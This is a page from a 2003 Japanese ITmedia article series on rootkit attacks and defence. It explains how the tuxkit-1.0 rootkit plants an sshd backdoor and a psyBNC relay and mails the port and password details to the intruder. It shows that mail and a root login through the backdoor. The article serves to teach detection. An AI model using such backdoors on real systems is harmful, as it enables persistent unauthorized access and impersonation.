エンタープライズ:特集 2003/01/15 16:59:00 更新

rootkitによるハッキングとその防御
第1回 rootkitの概要と検知 (2/5)

tuxkit-1.0による侵入の実際

 今回の例では、root権限での侵入に成功しているため、侵入後に、ターゲットサーバー上でrootkitをダウンロードし、インストールを行っている。tuxkit-1.0は、インストール時にパスワードとsshdのバックドア、およびpsyBNC(IRCサーバへのリレー接続用サーバ)のポートを指定する。インストール後にはメールでサーバのアドレス、各ポート、パスワードがインストールスクリプトで指定したメールアドレスへ送信される。

 tuxkitのインストールが完了すると下記のようなメールが指定したメールアドレスへ配信されてくる。

Delivered-To: hoge@example.com
Date: Sun, 27 Jan 2002 14:27:26 +0900
From: root 
To: hoge@example.com
Subject: Tuxkit1.0
  ssh 192.168.1.19 -l root -p 2600 # linux password: 123456 psyBNC: 2700

バックドアからの接続

 この時点で、指定したポート番号でSSHDのバックドア( /usr/bin/xsf)が開いている。これにより、たとえFTPサーバのセキュリティホールが塞がれた場合でも、

ssh 192.168.1.19 -l root -p 2600

 とすれば、下記のようにバックドアからの再侵入が可能になるわけだ。

[haxor@localhost /]$ ssh 192.168.1.19 -l root -p 2600 ←バックドアに接続
The authenticity of host '192.168.1.19 (192.168.1.19)' can't be established.
DSA key fingerprint is 6f:41:d8:33:ff:94:fa:68:ee:49:e3:df:e0:05:c6:2a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.19' (DSA) to the list of known hosts.
Tuxtendo Linux Rootkit v1.0 - We hope to please you kiddies!
          __       ____  _____   ._____________
        _/  |_ __ _\   \/  /  | _|__\__    ___/
        \   __\  |  \     /|  |/ /  | |    |
         |  | |  |  /     \|    <|  | |    |
         |__| |____/___/\  \__|_ \__| |____|
                         \_/    \/
                   Presented by Argv[]
                     www.tuxtendo.nl
                     (C) 15-12-2001
-------------------------------------------------------------
root@192.168.1.19's password: ←rootkitインストール時に設定したパスワードを入力
Last login: Thu Jan 01 1970 09:00:00 +0900 from 
You have new mail.
[root@localhost /root]#

 これでログインが完了し、あとはrootとして操作することができてしまう。

 なお、tuxkit-1.0はsshdのポート以外に、インストール時に指定したpsyBNCのポートも開いている。psyBNCはIRCのリレー接続用サーバで、侵入したシステムを介したIRCサーバへの接続を可能にする。つまり、IRCサーバへの「なりすまし」での接続が可能になる。下記はIRCクライアントであるmIRCで、侵入したシステムを介した接続を行った際の画面だ。

mirc.gif
インストール時に指定したpsyBNCのポートも開いているため、侵入したシステムを介したIRCサーバへの接続を可能にする。つまり「なりすまし」での接続が可能になる

前のページ | 1 2 3 4 5 | 次のページ

[TTS,ITmedia]